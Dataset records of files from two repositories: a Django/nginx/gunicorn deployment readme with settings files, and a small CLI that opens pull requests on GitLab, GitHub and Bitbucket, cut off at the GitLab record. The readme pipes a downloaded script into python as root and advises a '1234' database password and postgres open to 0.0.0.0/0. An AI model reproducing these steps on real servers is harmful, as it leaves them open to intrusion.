If you have one, you can probably transfer the management of it to that company. You could also leave it as you have it, and just point the DNS to the ip address of the VPS.\n\nFrom now on we assume that the server is already up and running and that you can execute `sudo` commands via SSH, for example using `ssh [email protected]` in bash.\nIf not, for example because you have walked through the Ubuntu installation yourself, make sure you install `openssh-server` (with `sudo apt install openssh-server`).\nIf you cannot log in because you have no root password, you should have created another user, say `eve`.\nThen you should be able to login with `eve` instead of `root`.\n\nRun `sudo apt update` and `sudo apt upgrade` before anything.\nRandom remark: note that `apt` is the user command, `apt-get` is the low-level command useful for scripting.\n\n## Setting up users and login\n\n1. If you already have a second user besides root, skip this step. Otherwise, log in via SSH with the root user. Create a new user with your name with `adduser eve`. Give her root permissions with `usermod -aG sudo eve`. Impersonate her with `sudo su - eve`. Note you have to do this and the next three instructions (adding a public key) for every user you want to give access to the server.\n1. Set up login with a key pair: if needed, generate keys on your local computer with `ssh-keygen -t rsa`; otherwise reuse the key you have. View your public key by executing (locally) in bash `cat ~/.ssh/id_rsa.pub` and copy *all* of the output. \n1. To put it on the server, use `mkdir ~/.ssh` to create the directory, `chmod 700 ~/.ssh` to change permissions, `nano ~/.ssh/authorized_keys` (nano is a text editor, you can also use vim) to put the key in this file and `chmod 600 ~/.ssh/authorized_keys`.\n1. 
Test that it works by opening a new bash window and check that you can login with eve without needing to enter your password.\n\n## Firewall and fail2ban\n1. Install a firewall, `sudo apt install ufw`.\n1. Allow SSH (22), Postgres (5432), http (80) and https (443) and other things you can think of: `sudo ufw allow xxx` where `xxx` is a port number.\n1. `sudo ufw enable` and check with `sudo ufw status`.\n1. Before closing your existing connection to the server, check if you can login to a new session! Otherwise you could lock yourself out.\n1. Besides a firewall, you also want to protect your server against bots that repeatedly try to guess your password, for that you can install `sudo apt install -y fail2ban`.\n1. Create a new file `sudo nano /etc/fail2ban/jail.local` and put into it\n```\n[sshd]\nenabled = true\nport = 22\nfilter = sshd\nlogpath = /var/log/auth.log\nmaxretry = 3\n```\n1. Start and enable (start on boot) the service with `sudo systemctl start fail2ban` and `sudo systemctl enable fail2ban`.\n\n## Local setup\n1. Add your server to PyCharm in Settings | Build, Execution, Deployment | Deployment, click on the plus icon, choose SFTP, enter the IP address of your server in SFTP host, specify user name, choose as authentication Key Pair and specify your key file, for Windows probably in `C:\\Users\\username\\.ssh\\id_rsa` or on Linux `/home/username/.ssh/id_rsa`. Also, if not already done, specify web server url as `http://myipadress`. \n 1. If you get the error 'Keypair is corrupt or has unknown format', then try selecting OpenSSH config as Authentication instead.\n 1. If you then still cannot make a connection, use password authentication.\n1. Make the server the default one by clicking an icon a few to the right of the 'plus' you used to add the server. When the server name becomes bold, you have set it as default.\n1. Go to Settings | Tools | SSH Terminal and select the server as Deployment server.\n1. You should now be able to ssh into your server with Tools | Start SSH Session (assigning a shortcut to this is a good idea: go to Settings | Keymap, search for 'start ssh' and add a shortcut, e.g. <kbd>Alt</kbd>+<kbd>S</kbd>).\n\n1. If needed (and if you already want your website domain to point to this VPS) point your (sub)domain to the ip address of your server, probably in the settings of the provider where you registered the domains. This can take a few hours to take effect.\n\n1. Install the packages we need with `sudo apt install python3-pip python3-dev libpq-dev postgresql postgresql-contrib nginx`.\n\n## <a name=\"postgres\">Setting up postgres</a>\n1. Start a postgres session with `sudo -u postgres psql`.\n1. `CREATE DATABASE mysite_db;`\n1. `CREATE USER mysite WITH PASSWORD '1234';`\n1. `ALTER ROLE mysite SET client_encoding TO 'utf8';`\n1. `ALTER ROLE mysite SET default_transaction_isolation TO 'read committed';`\n1. Now check if the timezone in `settings/base.py` is correct, if not you can modify it to for example `Europe/Amsterdam`. Then `ALTER ROLE mysite SET timezone TO 'Europe/Amsterdam';`\n1. `GRANT ALL PRIVILEGES ON DATABASE mysite_db TO mysite;`\n1. If you want to use tests which use the database (recommended, see https://docs.djangoproject.com/en/2.2/topics/testing/overview/) you also need to run `ALTER USER mysite CREATEDB;`\n1. `\\q` to exit\n1. Update the production database settings in `mysite/settings/production.py`\n1. Generate a new secret key to enter in the same file. 
For example using PyCharm's Python console with\n```python\nfrom django.utils.crypto import get_random_string\n\nchars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^*(-_=+)'\nprint(get_random_string(50, chars))\n```\n1. Make sure to keep this file secret. Also don't forget to check `DEBUG = False` in here.\n1. While you're there, also add your website domain to `ALLOWED_HOSTS` in the base settings. Be sure to add your server's ip address as well if you want to debug with that!\n1. Lastly, to enable connection from outside, you need to add `listen_addresses = '*'` at the end of `/etc/postgresql/9.5/main/postgresql.conf`, and in `/etc/postgresql/9.5/main/pg_hba.conf` you need to add `host all all 0.0.0.0/0 md5`.\n1. Restart postgres with `sudo /etc/init.d/postgresql restart`.\n1. If at any time you get the error \n```\npsycopg2.OperationalError: could not connect to server: Connection refused\n\tIs the server running on host \"x.x.x.x\" and accepting\n\tTCP/IP connections on port 5432?\n```\nthen the previous steps could be the problem (or your firewall is still blocking 5432, of course, or ... ).\n\n\n## Setting up a virtual environment\n1. Check that you're running the python 3 version of pip with `pip -V`. If not, try `pip3 -V`. If that works, you have to substitute `pip` with `pip3` from now on.\n1. Similarly, check if you're using python 3 with `python -V`, and if you need `python3` then substitute, or do something else to fix it.\n    * If you need Python 3.7 but the Linux distribution you have doesn't have it, you can follow instructions at https://serverfault.com/a/919064/437404 because this will also install pip. Now you will need to use `python3.7` and `pip3.7` instead of `python` and `pip` in any command. Do not remove the default installed python 3.5.\n1. Install the package with `pip install virtualenv`.\n    * If this fails because of permissions, ensure ownership of python to install packages with `sudo chown -R eve:eve /usr/local`.\n1. I happen to want my virtual environments in `/opt/` so I do `cd /opt`.\n    * (if you are the only person who is ever going to work on it, putting it in `/home/username` would avoid some permission problems)\n1. Make sure you create a virtual environment with the latest python you installed! Creating a virtual environment appears to be very much liable to change with python versions, so if the following steps don't work just search for instructions for your specific environment.\n1. Install venv with `sudo apt install python3-venv`.\n1. I had python 3.5 installed, checked with `python3.5 -V`. Then you should be able to create a virtual environment with `sudo python3.5 -m venv mysite_env`. Same for 3.7 etc.\n    * If that does not work, I once solved that under python 3.6 by doing `sudo python3.6 -m venv --without-pip mysite_env`, `source mysite_env/bin/activate`, `sudo apt install curl`, then found out curl doesn't run as sudo so did `sudo bash -c \"curl https://bootstrap.pypa.io/get-pip.py | python\"` then `deactivate`. \n1. Every time you want to do something in your virtual environment, activate it with (change `mysite` to your website name) `source mysite_env/bin/activate`. Do so, now.\n1. Check with `python -V` for correct python version, and `pip -V` for correct pip version in the correct location (should be in the virtual environment).\n    * If you did set the virtual environment up without pip, download it with `wget https://bootstrap.pypa.io/get-pip.py`, install with `python3.6 get-pip.py`. \n1. 
Check with `which pip` and `which python` that everything points inside your virtual environment. If you do need to use for example `python3.6` instead of `python`, remember that or fix the `python` command to avoid mistakes.\n\n## Uploading project\n1. `cd mysite_env` and `sudo mkdir mysite`, then correct ownership with `sudo chown -R eve:eve /opt/`.\n1. In PyCharm, go to the deployment settings of your server as before and edit Root path to the directory you just created, so `/opt/mysite_env/mysite`. Under Mappings, specify `/` as Deployment Path. \n1. Under Options (click on the arrow next to Deployment in the left menu) you can specify to upload changes automatically or if you hit `CTRL+S`. Click Ok.\n1. You don't want to upload everything you have locally to the server, for example it makes no sense to upload files in your local virtual environment. To exclude these paths, go to Settings | Build, Execution, Deployment | Deployment | Excluded Paths and add them, by hitting the plus icon and choosing Local Path.\n    * You may notice that if you try to exclude a folder which is marked as Excluded in PyCharm (not excluded from upload, but excluded like not belonging to the project, which you can see as the folder is marked red) then you cannot exclude it from deployment and you will get a message saying 'Local path is out of project'. (Note, however, that sometimes you *can* exclude it even though you get the warning.) This is a bug in PyCharm, vote for it at https://youtrack.jetbrains.com/issue/WI-7367. To exclude these folders for deployment, first unmark them as excluded by right-clicking on them and choosing Mark Directory as | Cancel Exclusion. Now you can exclude them for deployment, and mark them again as excluded after you did that (PyCharm will give an error in the settings but it will still work).\n1. Now theoretically you should be able to upload everything by hitting <kbd>Ctrl</kbd>+<kbd>S</kbd>, but we have found that often this does not work. A more reliable way is to first select your project folder in the project view on the left (probably the topmost folder) and then select Tools | Deployment | Upload to ..., or use the default shortcut <kbd>Ctrl</kbd>+<kbd>Alt</kbd>+<kbd>Shift</kbd>+<kbd>X</kbd> and choose your server.\n\n## Installing dependencies\n1. If you need `mysqlclient`, first run `sudo apt install python3.5-dev libmysqlclient-dev`, which is needed for the `mysqlclient` package.\n1. If you didn't remember, check with `which python` (with virtualenv activated) where your python hides, then in PyCharm go to Settings | Project ... | Project Interpreter and add a new remote one by selecting the gear icon at the top right.\n1. Select SSH Interpreter in the left menu, then Existing Server Configuration, select as Deployment Configuration your server and Move Deployment Server, then select the right path to your python _of the virtual environment_. Also take care to change the Sync paths, of which the remote path probably should be `/` - but make sure to check the Deployment path under Mappings afterwards and reset it to `/`.\n1. PyCharm should warn you about some dependencies from requirements.txt not being installed; install them. Probably PyCharm will also install helper files which can take a long time.\n1. 
Make sure you have the remote python selected as interpreter (you can also check for package updates there). Now you can, just like before, hit Tools | Run Manage.py Task and run `makemigrations` and `migrate` but now both with production settings: so `makemigrations --settings=mysite.settings.production` and also for `migrate`.\n1. If that fails, try running these tasks manually, so go to `/opt/mysite_env/mysite` and run `python manage.py makemigrations` and same for `migrate`.\n1. If needed, create superuser just as with local setup, `createsuperuser --username myname`.\n1. Run the manage.py task `collectstatic --settings=mysite.settings.production` to gather static files for nginx to serve.\n1. Double-check that Deployment Settings | Mappings | Deployment Path is set to `/`, PyCharm sometimes resets this. If this is wrong, uploading files won't work properly. \n\n## Setting up gunicorn\n1. We will set up gunicorn such that nginx will be able to redirect requests to gunicorn which is bound to the Django server.\n1. Copy the contents of the [`gunicorn_start`](server%20configuration%20files/gunicorn_start) script into `/opt/mysite_env/bin/` (after changing all the paths, of course): create the file with `nano /opt/mysite_env/bin/gunicorn_start` (do not use sudo or FileZilla here) and make sure it has executable permissions with `sudo chmod u+x /opt/mysite_env/bin/gunicorn_start`.\n\n## Setting up supervisor\n1. We use supervisor to manage the starting and stopping of gunicorn. If your server would crash or for whatever reason is restarted, this makes sure to automatically start your website too.\n1. Install with `sudo apt install supervisor`.\n1. Put the file [`mysite.conf`](server%20configuration%20files/mysite.conf) in `/etc/supervisor/conf.d/mysite.conf` (e.g. with `sudo nano`), and make sure it has executable permissions just like with the gunicorn start script.\n1. Every time after you change such a supervisor config file, you have to do `sudo supervisorctl reread` and `sudo supervisorctl update`. Do this now. I gathered things to remember like this [below](#remember).\n1. You can manually restart with `sudo supervisorctl restart mysite`.\n\n## Setting up nginx\n1. Install with `sudo apt install nginx`\n1. If you do not have the folders `/etc/nginx/sites-available/` and `/etc/nginx/sites-enabled`, you can create them and you also need to include them by putting in `/etc/nginx/nginx.conf` at the bottom of the `http` block the following:\n```\ninclude /etc/nginx/conf.d/*.conf;\ninclude /etc/nginx/sites-enabled/*;\n```\nand remove the `server` block in the `http` block.\n1. Copy the content of the [`nginx-config`](server%20configuration%20files/nginx-config) into the file `/etc/nginx/sites-available/mysite` (e.g. with `sudo nano`). We will set up https later.\n1. Enable your site by making the symbolic link `sudo ln -s /etc/nginx/sites-available/mysite /etc/nginx/sites-enabled/mysite`\n1. Remove the symbolic link to the default config, `sudo rm /etc/nginx/sites-available/default` and `sudo rm /etc/nginx/sites-enabled/default`\n1. Create empty log file `mkdir /opt/mysite_env/mysite/logs/` and `touch /opt/mysite_env/mysite/logs/nginx-access.log`.\n1. Make the socket directory with `mkdir /opt/mysite_env/mysite/run/`.\n1. Create an empty socket file `touch /opt/mysite_env/mysite/run/gunicorn.sock` in the same way, and also `sudo chmod 666 /opt/mysite_env/mysite/run/gunicorn.sock`. If at any time you get the error that this is not a socket, remove it. 
A socket is just a text file, with the great usefulness of enabling nginx to talk to gunicorn in a language that they both understand.\n1. Make sure the lines in the nginx config which point to the ssl certificates are commented.\n1. Test the syntax of your nginx config file with `sudo nginx -t` and fix any errors it reports.\n\n1. Make sure you have your ip and domain (without the `http(s)://` prefix, but both with and without the `www.` prefix) in allowed hosts in your Django settings file.\n1. If you will set up https later, you can skip the https section below, but make sure to start nginx in the section after that.\n\n## Setting up HTTPS\nBecause it's not much work and free, just do it. You need to have your domain pointing to your ip address already.\n\n1. You can get an ssl certificate for free, for example from Let's Encrypt. In that case, just follow their [install guide](https://certbot.eff.org/#ubuntuxenial-nginx). \n1. When running certbot, when it asks for domains provide it both with and without the `www.` prefix. If you have to choose an authentication method: you are not serving files out of a directory on the server. \n1. Either choose in the certbot setup to redirect http to https (in which case you need to add your domain without `www.` prefix to `server_name` in the largest `server ` block) or do this yourself by uncommenting the https-related parts in the `nginx-config`, marked with `# ---- HTTPS setup start/end ----`, and remove the `listen 80;` line.\n1. In any case, make sure the main server block has only one `listen ...` line, one `server_name ...` line etc.\n1. Possibly you need to `sudo fuser -k 80/tcp` to clean things up after setting up https. \n\n## Start nginx\n1. Start nginx with `sudo service nginx start`. Note that if you get `service: command not found` then whenever this tutorial uses `service` like this you need to use `sudo systemctl start nginx` instead. \n1. In the future, restart nginx with `sudo service nginx restart`. \n1. In case that fails, check the logs at `tail /var/log/long.err.log` or `tail /var/log/long.out.log` to view the error.\n1. Try to reach your website. If it doesn't work, try setting `DEBUG = True` in settings and then `sudo supervisorctl restart mysite`, reload page.\n1. If it still does not work, restart both nginx (see above) and gunicorn with `sudo supervisorctl restart mysite`\n\nNow go in your browser to your ip address or domain and you should see your website.\nIf not, check the logs for errors (see [below](#remember)).\n\n### Setting up automatic renewal of https certificates\n1. Check the [certbot user guide](https://certbot.eff.org/docs/using.html#automated-renewals) to see if you got automated renewal out of the box. For Ubuntu version >= 17.10, this should be okay. This means that there is a cronjob that runs twice a day to renew all certificates that are about to expire. All we have to do is restart the nginx server after each renewal.\n1. Run `sudo vim /etc/cron.d/certbot` and append `--renew-hook \"service nginx restart\"` so that the last line looks like `0 */12 * * * root test -x /usr/bin/certbot -a \\! -d /run/systemd/system && perl -e 'sleep int(rand(43200))' && certbot -q renew --renew-hook \"service nginx restart\"`.\n1. Run `sudo certbot renew --dry-run`, this should simulate renewal. 
If this succeeds without errors, everything should be okay.\n\nTo renew certificates manually, do `sudo certbot renew`.\n\n## <a name=\"remember\">To remember</a>\n### Django files\nAfter making changes to Django files, run `sudo supervisorctl restart mysite`.\n### Django models\nAfter making changes to Django models, in PyCharm start Tools | Run Manage.py Task and run `makemigrations --settings=mysite.settings.production` and `migrate --settings=mysite.settings.production` (or from the command line, `python3.6 manage.py makemigrations --settings=...`)\n### Static files\nAfter making changes to static files run as manage.py task `collectstatic`. If run from the command line, I think you need to activate the virtual environment first.\n### Supervisor config\nEvery time after you change a supervisor config file in `/etc/supervisor/conf.d/mysite.conf`, you have to do `sudo supervisorctl reread` and `sudo supervisorctl update`.\n### gunicorn start script\nRestart supervisor with `sudo supervisorctl restart mysite`.\n### nginx config\nAfter changing nginx config files in `/etc/nginx/sites-available/mysite`, test syntax with `sudo nginx -t` and run `sudo service nginx restart`.\n### logs\nGeneral logs are viewed with `tail /var/log/long.err.log` or `tail /var/log/long.out.log`, and the nginx log can be found with `tail /opt/mysite_env/mysite/logs/nginx-error.log` as specified in the nginx config file.\n\nIf you get an error and nothing appears in the logs, try setting `DEBUG = True` in settings and then `sudo supervisorctl restart mysite`, reload page.\n"
},
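The readme's troubleshooting step for `psycopg2.OperationalError` can be isolated from Django with a quick connectivity probe. A sketch; the credentials mirror the tutorial's placeholders:

```python
# Sketch: verify that postgres accepts TCP connections before blaming Django.
import psycopg2

conn = psycopg2.connect(
    dbname='mysite_db',
    user='mysite',
    password='1234',
    host='127.0.0.1',  # use the server's ip to test remote access
    port=5432,
)
print(conn.get_dsn_parameters())
conn.close()
```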
{
"alpha_fraction": 0.6859027147293091,
"alphanum_fraction": 0.6949711441993713,
"avg_line_length": 27.65354347229004,
"blob_id": "7abe0c28b319e2d3e356452a38a182680392fc94",
"content_id": "e1078dcf3766dc050b801ce505c7bd9d92eca4b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3639,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 127,
"path": "/mysite/settings/base.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDjango settings for django-template project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.11/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n]\n\n# Application definition\n\nINSTALLED_APPS = [\n 'pages',\n 'tinymce', # Text editor for website backend\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'mysite.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'mysite.wsgi.application'\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Amsterdam'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/dev/howto/static-files/\n\n# Place where the static files will end up after collectstatic.\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n# Place where static files will be served on your website, http://website.com/STATIC_URL/app/style.css for example.\n# In production this will be replaced by the NGINX config file\nSTATIC_URL = '/static/'\n\n# A list of folders where Django will search for additional static files, in addition to\n# each static folder of each app installed.\nSTATICFILES_DIRS = [\n]\n\n# Makes sure Django looks for static files in each static folder in each app\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\nTINYMCE_DEFAULT_CONFIG = {\n 'theme': 'advanced',\n 'relative_urls': False,\n 'width': 800,\n 'height': 400,\n 'content_css': '/static/pages/style.css',\n 'plugins': 'paste',\n 'paste_as_text': True,\n}\n"
},
{
"alpha_fraction": 0.7672955989837646,
"alphanum_fraction": 0.7672955989837646,
"avg_line_length": 25.5,
"blob_id": "ef938c0db48d065a4b6e5e3aec9589e4459e7910",
"content_id": "ebb9745a5028521b093d09c843b9bee5645ef050",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 6,
"path": "/pages/admin.py",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "\"\"\" This file is here to register objects with the admin site. \"\"\"\nfrom django.contrib import admin\n\nfrom .models import Article\n\nadmin.site.register(Article)\n"
},
{
"alpha_fraction": 0.8062015771865845,
"alphanum_fraction": 0.8062015771865845,
"avg_line_length": 35.85714340209961,
"blob_id": "970a42e8248502bf07b29819e088d1dedfcd945b",
"content_id": "67c0f8b1951009e60b6f9a4a4c6a4cfba30f7fe2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 258,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 7,
"path": "/server configuration files/gunicorn_start",
"repo_name": "PHPirates/django-template",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd /opt/mysite_env/mysite\nsource ../bin/activate\nexport DJANGO_SETTINGS_MODULE=mysite.settings.production\nexport PYTHONPATH=/opt/mysite_env/mysite:$PYTHONPATH\ngunicorn mysite.wsgi:application --bind=unix:/opt/mysite_env/mysite/run/gunicorn.sock\n"
}
] | 10 |
eerorika/pullrequest | https://github.com/eerorika/pullrequest | b04025338ad870fb2aebc8f10023a4b3cde404b1 | 4eabc7b61f590c295271fbd380fd24ad66d783c3 | 7c306e7f70ce0728e95791e6a494e9345343e60b | refs/heads/master | 2020-12-10T03:58:43.866394 | 2020-01-31T00:37:55 | 2020-01-31T00:37:55 | 233,496,109 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5788461565971375,
"alphanum_fraction": 0.5846154093742371,
"avg_line_length": 21.60869598388672,
"blob_id": "2f6dc025e57d6b677171c82ee46e7c54877c0c8d",
"content_id": "197fc2308f720d281713a705140c7515f6c34a6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 520,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 23,
"path": "/setup.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\n\nsetup(\n name='pullrequest',\n version='0.1.4',\n author='Eero Rikalainen',\n author_email='[email protected]',\n url='https://github.com/eerorika/pullrequest',\n description='Create pullrequest to git service',\n license='MIT',\n packages=find_packages(),\n install_requires=[\n 'PyGithub',\n 'python-gitlab',\n 'requests_oauthlib',\n ],\n entry_points={\n 'console_scripts': [\n 'pullrequest = pullrequest.cli:main'\n ]\n },\n)\n"
},
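The `console_scripts` entry point above is what makes a `pullrequest` command appear on PATH after installation. Roughly, the generated wrapper behaves like this sketch (the real script is produced by setuptools/pip, not shipped in the repo):

```python
# Sketch of the generated console script, simplified.
import sys

from pullrequest.cli import main

if __name__ == '__main__':
    sys.exit(main())
```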
{
"alpha_fraction": 0.6192052960395813,
"alphanum_fraction": 0.6197147369384766,
"avg_line_length": 37.490196228027344,
"blob_id": "b8f07e2423ab325bf80a47855834ff1c8bef0c68",
"content_id": "4abedd80277e7edf6f5bfaab1435221f15581099",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3926,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 102,
"path": "/pullrequest/cli.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\nimport subprocess\nfrom sys import stdout\n\n\ndef main():\n services = {}\n try:\n from pullrequest import gitlab\n services['gitlab'] = gitlab.create\n except ImportError:\n pass\n try:\n from pullrequest import github\n services['github'] = github.create\n except ImportError:\n pass\n try:\n from pullrequest import bitbucket_cloud\n services['bitbucket'] = bitbucket_cloud.create\n except ImportError:\n pass\n default_service = next(iter(services))\n\n try:\n current_branch = subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\\\n .decode(stdout.encoding).strip()\n if ' ' in current_branch:\n current_branch = None\n except subprocess.CalledProcessError:\n current_branch = None\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Create pullrequest to git service')\n parser.add_argument('--key', help='private key/token or oauth2 client id')\n parser.add_argument('--secret', help='oauth secret')\n parser.add_argument('--head', default=current_branch, help='Name of args.head branch that is the source of changes')\n parser.add_argument('--base', default='master', help='Name of base branch that is the target of changes')\n parser.add_argument('--title')\n parser.add_argument('--description')\n parser.add_argument('--repository', help='Repository or project slug / name')\n parser.add_argument('--reviewer', nargs='+', help='Users that should be set as reviewer or assignee')\n parser.add_argument('--label', nargs='+', help='Labels to apply (not supported by all services)')\n parser.add_argument('--url', help='Url of the service (not supported by all services)')\n parser.add_argument('--close_source_branch', action='store_true',\n help='Close source branch on merge (not supported by all services)')\n parser.add_argument('--commit', action='store_true', help='Commit all changes')\n parser.add_argument('--remote', default='origin', help='Name of remote repo to push to')\n parser.add_argument('--service', help=', '.join(services.keys()))\n args = parser.parse_args()\n\n if not args.service:\n try:\n remote_url = subprocess.check_output(['git', 'remote', 'get-url', '--push', args.remote])\\\n .decode(stdout.encoding).strip()\n except subprocess.CalledProcessError:\n remote_url = None\n if not args.service:\n if remote_url:\n for service in services.keys():\n if service in remote_url:\n args.service = service\n if not args.service:\n args.service = default_service\n\n if args.service == 'gitlab' and not args.url:\n args.url = 'https://gitlab.com/'\n\n print('Using service <{}>'.format(args.service))\n\n if args.head:\n if current_branch != args.head:\n print('Creating branch <{}>'.format(args.head))\n subprocess.check_call(['git', 'checkout', '-b', args.head])\n else:\n args.head = current_branch\n assert args.head and args.head != args.base\n\n if args.commit:\n print('Committing changes')\n subprocess.check_call(['git', 'commit', '-a', '-m', args.title])\n elif not args.title:\n try:\n args.title = subprocess.check_output(['git', 'log', '-1', '--pretty=%B']).decode(stdout.encoding).strip()\n except subprocess.CalledProcessError:\n pass\n\n print('Pushing branch <{}> to remote <{}>'.format(args.head, args.remote))\n subprocess.check_call(['git', 'push', '-u', args.remote, args.head])\n\n print('Creating pull request')\n create = services[args.service]\n result = create(**vars(args))\n print(result)\n pass\n\n\nif __name__ == '__main__':\n main()\n"
},
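`main()` builds a name-to-factory registry and ends with `services[args.service](**vars(args))`, so each backend only needs to expose a `create(...)` that tolerates extra keyword arguments. A sketch of that dispatch contract with a stand-in backend (`mock_create` is not part of the package):

```python
# Sketch: the dispatch contract the cli relies on.
def mock_create(title, head, base='master', **_):
    # **_ swallows cli arguments this backend does not care about
    return 'would open PR "{}": {} -> {}'.format(title, head, base)

services = {'mock': mock_create}
args = {'title': 'Fix typo', 'head': 'typo-fix', 'description': None}
print(services['mock'](**args))
```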
{
"alpha_fraction": 0.6090182662010193,
"alphanum_fraction": 0.6135844588279724,
"avg_line_length": 26.809524536132812,
"blob_id": "6099fb12b5da53e69ae233c4705e5652e7b2cdc4",
"content_id": "fd5e99593e5c7cd8c203c5237d18dfb374730fa8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1752,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 63,
"path": "/pullrequest/bitbucket_cloud.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
"text": "import requests\nfrom requests_oauthlib import OAuth2Session\nfrom oauthlib.oauth2 import BackendApplicationClient\nfrom uuid import UUID\n\nbb_api_root = 'https://api.bitbucket.org'\n\n\ndef create(key, secret, repository, title, description, head, base='master', reviewer=None, close_source_branch=False,\n **_):\n if not reviewer:\n reviewer = []\n auth_headers = bb_authenticate(key, secret)\n reviewer_uuids = [{\n 'uuid': bb_user_to_uuid(auth_headers, r),\n } for r in reviewer]\n payload = {\n 'title': title,\n 'description': description,\n 'source': {'branch': {'name': head}},\n 'destination': {'branch': {'name': base}},\n 'reviewers': reviewer_uuids,\n 'close_source_branch': close_source_branch,\n }\n url = '{}/2.0/repositories/{}/pullrequests'.format(bb_api_root, repository)\n return requests.post(\n url=url,\n json=payload,\n headers=auth_headers,\n ).content\n\n\ndef bb_authenticate(key, secret):\n client = BackendApplicationClient(client_id=key)\n oauth = OAuth2Session(client=client)\n ft = oauth.fetch_token(\n token_url='https://bitbucket.org/site/oauth2/access_token',\n client_id=key,\n client_secret=secret\n )\n at = ft['access_token']\n return {'Authorization': 'Bearer {}'.format(at)}\n\n\ndef bb_user_to_uuid(headers, user):\n if isinstance(user, dict):\n return user['uuid']\n if is_uuid(user):\n return user\n r = requests.get(\n url='{}/2.0/users/{}'.format(bb_api_root, user),\n headers=headers,\n )\n user_info = r.json()\n return user_info['uuid']\n\n\ndef is_uuid(arg):\n try:\n uuid = UUID(arg)\n except ValueError:\n return False\n return arg == uuid\n"
},
{
"alpha_fraction": 0.5951265096664429,
"alphanum_fraction": 0.5960637331008911,
"avg_line_length": 25.674999237060547,
"blob_id": "48810a4c1740f802096774ccf02cf912cfb90728",
"content_id": "0e759f358bf5c5efff7af994861badb808a9f83b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1067,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 40,
"path": "/pullrequest/gitlab.py",
"repo_name": "eerorika/pullrequest",
"src_encoding": "UTF-8",
